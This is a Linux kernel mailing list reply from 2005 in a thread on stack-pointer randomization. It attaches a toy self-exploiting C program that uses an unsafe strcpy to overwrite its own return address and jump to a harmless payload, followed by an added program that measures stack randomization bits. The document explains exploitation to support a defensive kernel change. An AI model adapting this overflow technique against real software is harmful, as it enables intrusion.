From: John Richard Moser <nigelenki@comcast.net>
To: Arjan van de Ven <arjan@infradead.org>
Cc: linux-os@analogic.com,
Linux kernel <linux-kernel@vger.kernel.org>,
akpm@osdl.org
Subject: Re: Patch 4/6 randomize the stack pointer
Date: Thu, 27 Jan 2005 15:13:14 -0500 [thread overview]
Message-ID: <41F94B5A.2030301@comcast.net> (raw)
In-Reply-To: <1106856178.5624.128.camel@laptopd505.fenrus.org>
[-- Attachment #1.1: Type: text/plain, Size: 1171 bytes --]
In other words, no :)
Here's self-exploiting code to discover its own return address offset
and exploit itself. It'll lend some insight into how this stuff works.
Just a toy.
Arjan van de Ven wrote:
> On Thu, 2005-01-27 at 14:19 -0500, linux-os wrote:
>
>>Gentlemen,
>>
>>Isn't the return address on the stack an offset in the
>>code (.text) segment?
>>
>>How would a random stack-pointer value help? I think you would
>>need to start a program at a random offset, not the stack!
>>No stack-smasher that worked would care about the value of
>>the stack-pointer.
>
>
> the simple stack exploit works by overflowing a buffer ON THE STACK with
> a "dirty" payload and then also overwriting the return address to point
> back into that buffer.
>
> (all the security guys on this list will now cringe about this over
> simplification; yes reality is more complex but lets keep the
> explanation simple for Richard)
>
> pointing back into that buffer needs the address of that buffer. That
> buffer is on the stack, which is now randomized.
>
>
>
--
All content of all messages exchanged herein are left in the
Public Domain, unless otherwise explicitly stated.
[-- Attachment #1.2: exploit.c --]
[-- Type: text/plain, Size: 1027 bytes --]
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* _exit() */

/*
 * Toy self-exploiting program.  It assumes the classic frame layout (the
 * saved return address sits above the local buffer) and no stack-protector
 * canary between them: build with gcc -fno-stack-protector.
 */
int payload();
int exploit(char *d);

int main() {
    int distance;
    char a[512] = {0};

    /* First call: ask exploit() how far its buffer is from its saved return */
    distance = exploit(NULL);

    /* Filler bytes up to the saved return address slot */
    memset(a, 0xFF, distance);
    /* Get our payload address: this word lands on the saved return */
    *(void**)(a + distance) = &payload;
    *(void**)(a + distance + sizeof(void*)) = 0; /* cap: NUL ends the strcpy */
    /* strcpy() stops at the first zero byte, so any zero byte inside &payload
       ends the copy there; the bytes it leaves untouched must already match */

    /* exploit the payload: the unsafe strcpy() writes our string over the frame */
    exploit(a);
    /* we never reach this */
    return 255;
}

/*
 * exploit()
 * This overflows its own buffer and causes the return to jump to payload().
 * Called with d == NULL it instead measures, byte by byte, the distance from
 * its buffer a to the slot holding its own return address.
 */
int exploit(char *d) {
    char a[400] = {0};
    char *i;
    int distance = 0;
    char payld[sizeof(void*) + 1]; /* unused; kept as part of the original frame */
    void *myret;
    void *z;                       /* unused; kept as part of the original frame */
    if (!d) {
        myret = __builtin_return_address(0); /* GCC builtin: our own saved return */
        /* find the distance between a and myret: walk up the stack one byte
           at a time until the word at i equals the saved return address */
        for (i = a; *(void**)i != myret; i++) {
            distance++;
        }
        return distance;
    }
    /* We're passed a d buffer, so strcpy it unsafely */
    strcpy(a, d);
    /* Return to payload(): the ret pops the overwritten slot */
    return 1;
}

int payload() {
    printf("Payload executed successfully!\n");
    /* 0: Unsafe; successful exploit */
    _exit(0);
}
[-- Attachment #2: OpenPGP digital signature --]
[-- Type: application/pgp-signature, Size: 256 bytes --]
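A note on the two viewpoints in the thread, as an aside that is not part of any message above: the toy exploit.c returns into payload(), an address in .text, so it never needs to know where its buffer is; the case Arjan describes, returning into the overflowed buffer itself, is the one that needs the stack address and the one that stack randomization defeats. The program below is an added example, not code from the thread or from the patch series, for checking how much stack randomization a kernel actually hands out. It spawns fresh images of itself (fork() alone is not enough, since a forked child inherits the parent's layout; only exec() rerandomizes), reads back the address of a stack local from each, and counts the address bits that vary. It assumes Linux with /proc/self/exe and the randomize_va_space sysctl; the function names and the "--report" argument are this example's own.

```c
/* Added example (not from the thread): how many bits of a stack address
 * actually vary between fresh process images?  Linux-only: assumes
 * /proc/self/exe and the randomize_va_space sysctl exist. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Count the bits that take more than one value across the samples:
 * OR together each sample XOR the first, then popcount the result. */
int randomized_bits(const uintptr_t *samples, size_t n)
{
    uintptr_t varying = 0;
    int bits = 0;
    for (size_t i = 1; i < n; i++)
        varying |= samples[i] ^ samples[0];
    for (; varying; varying >>= 1)
        bits += (int)(varying & 1);
    return bits;
}

/* Current value of /proc/sys/kernel/randomize_va_space (the sysctl this
 * patch series introduced), or -1 if it cannot be read. */
int randomize_va_space_setting(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v = -1;
    if (!f)
        return -1;
    if (fscanf(f, "%d", &v) != 1)
        v = -1;
    fclose(f);
    return v;
}

/* Run a fresh image of this program in "--report" mode and read back the
 * address of a stack local in that image.  fork() alone is not enough: a
 * forked child inherits the parent's layout, only exec() rerandomizes. */
uintptr_t sample_stack_address(void)
{
    int fd[2];
    char buf[32] = {0};
    ssize_t n;
    pid_t pid;

    if (pipe(fd) != 0)
        return 0;
    pid = fork();
    if (pid < 0)
        return 0;
    if (pid == 0) {
        dup2(fd[1], STDOUT_FILENO);
        close(fd[0]);
        close(fd[1]);
        execl("/proc/self/exe", "stackrand", "--report", (char *)NULL);
        _exit(127);
    }
    close(fd[1]);
    n = read(fd[0], buf, sizeof buf - 1);
    close(fd[0]);
    waitpid(pid, NULL, 0);
    return n > 0 ? (uintptr_t)strtoull(buf, NULL, 16) : 0;
}

int main(int argc, char **argv)
{
    enum { SAMPLES = 32 };
    uintptr_t samples[SAMPLES];
    size_t got = 0;

    if (argc > 1 && strcmp(argv[1], "--report") == 0) {
        /* child mode: print where our own stack buffer landed */
        char local[64];
        printf("%lx\n", (unsigned long)(uintptr_t)local);
        return 0;
    }
    for (size_t i = 0; i < SAMPLES; i++) {
        uintptr_t a = sample_stack_address();
        if (a)
            samples[got++] = a;
    }
    printf("randomize_va_space = %d\n", randomize_va_space_setting());
    if (got < 2) {
        fprintf(stderr, "could not sample child stacks\n");
        return 1;
    }
    printf("%zu samples, %d varying stack address bits\n",
           got, randomized_bits(samples, got));
    return 0;
}
```

With randomize_va_space set to 0 the varying-bit count is 0 (every image gets the same stack), which is the condition under which a return-into-buffer exploit can hardcode its address; with randomization on, the count is the number of bits an attacker has to guess or leak, and it is the low-order page-offset bits plus however many the kernel randomizes above them.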
Thread overview: 91+ messages
2005-01-27 10:11 Patch 0/6 virtual address space randomisation Arjan van de Ven
2005-01-27 10:12 ` Patch 1/6 introduce sysctl Arjan van de Ven
2005-01-27 10:36 ` Andi Kleen
2005-01-27 11:13 ` Arjan van de Ven
2005-01-27 18:16 ` Pavel Machek
2005-01-27 19:11 ` Ingo Molnar
2005-01-27 19:46 ` Dave Jones
2005-01-27 19:53 ` Ingo Molnar
2005-01-27 19:53 ` Arjan van de Ven
2005-02-04 21:27 ` Benoit Boissinot
2005-01-27 10:12 ` Patch 2/6 introduce helper infrastructure Arjan van de Ven
2005-01-27 10:41 ` Andi Kleen
2005-01-27 11:58 ` Arjan van de Ven
2005-01-27 12:27 ` Andi Kleen
2005-01-27 12:43 ` Arjan van de Ven
2005-02-01 21:14 ` Matt Mackall
2005-01-27 10:12 ` Patch 3/6 per process flag Arjan van de Ven
2005-01-27 10:13 ` Patch 4/6 randomize the stack pointer Arjan van de Ven
2005-01-27 10:21 ` Christoph Hellwig
2005-01-27 17:38 ` John Richard Moser
2005-01-27 17:47 ` Arjan van de Ven
2005-01-27 18:04 ` John Richard Moser
2005-01-27 18:09 ` Arjan van de Ven
2005-01-27 18:12 ` Christoph Hellwig
2005-01-27 18:16 ` Linus Torvalds
2005-01-27 18:28 ` Linus Torvalds
2005-01-27 18:55 ` John Richard Moser
2005-01-27 18:49 ` John Richard Moser
2005-01-27 19:30 ` Linus Torvalds
2005-01-27 19:48 ` Arjan van de Ven
2005-01-27 19:59 ` Linus Torvalds
2005-01-27 20:04 ` Arjan van de Ven
2005-01-27 20:08 ` John Richard Moser
2005-01-27 19:19 ` linux-os
2005-01-27 19:52 ` Julien TINNES
2005-01-27 20:02 ` Arjan van de Ven
2005-01-27 20:13 ` John Richard Moser [this message]
2005-01-27 21:33 ` jnf
2005-01-28 17:22 ` Paulo Marques
2005-01-28 17:51 ` John Richard Moser
2005-01-28 18:42 ` Ingo Molnar
2005-01-29 6:04 ` John Richard Moser
2005-01-27 20:37 ` linux-os
2005-01-27 20:45 ` John Richard Moser
2005-01-27 21:39 ` John Richard Moser
2005-01-27 21:53 ` Arjan van de Ven
2005-01-27 22:34 ` John Richard Moser
2005-01-29 2:50 ` Rik van Riel
2005-01-29 6:31 ` John Richard Moser
2005-01-29 8:10 ` Arjan van de Ven
[not found] ` <41FBB821.3000403@comcast.net>
2005-01-29 16:42 ` Arjan van de Ven
2005-01-29 16:59 ` John Richard Moser
2005-01-29 16:46 ` Arjan van de Ven
2005-01-29 17:04 ` John Richard Moser
2005-01-29 17:37 ` Jakub Jelinek
2005-01-29 17:49 ` John Richard Moser
2005-01-29 17:55 ` Christoph Hellwig
2005-01-29 18:10 ` John Richard Moser
2005-01-29 18:12 ` Rik van Riel
2005-01-29 18:16 ` Christoph Hellwig
2005-01-29 7:46 ` John Richard Moser
2005-01-27 18:40 ` Felipe Alfaro Solana
2005-01-27 22:31 ` Jirka Kosina
2005-01-28 5:58 ` Ingo Molnar
2005-01-28 19:02 ` David Lang
2005-01-28 7:33 ` Arjan van de Ven
2005-01-27 19:43 ` Julien TINNES
2005-01-28 0:10 ` H. Peter Anvin
2005-01-28 0:23 ` Roland Dreier
2005-01-28 1:06 ` H. Peter Anvin
2005-01-28 2:03 ` Horst von Brand
2005-01-28 8:45 ` Julien TINNES
2005-01-27 20:23 ` Christoph Hellwig
2005-01-27 20:27 ` Arjan van de Ven
2005-01-27 20:32 ` Christoph Hellwig
2005-01-27 20:35 ` Arjan van de Ven
2005-01-27 20:40 ` Rik van Riel
2005-01-27 20:42 ` Christoph Hellwig
2005-01-27 20:56 ` Arjan van de Ven
2005-01-27 21:13 ` Linus Torvalds
2005-01-27 10:13 ` Patch 5/6 randomize mmap addresses Arjan van de Ven
2005-01-27 10:14 ` Patch 6/6 default enable randomisation for -mm Arjan van de Ven
2005-01-27 11:45 ` Patch 0/6 virtual address space randomisation Julien TINNES
2005-01-27 11:57 ` Arjan van de Ven
2005-01-27 17:42 ` John Richard Moser
2005-01-27 19:34 ` Julien TINNES
2005-01-27 19:57 ` John Richard Moser
2005-01-27 20:13 ` Arjan van de Ven
2005-01-28 8:45 ` David Weinehall
-- strict thread matches above, loose matches on Subject: below --
2005-01-31 10:55 Patch 4/6 randomize the stack pointer linux
2005-01-31 17:28 ` John Richard Moser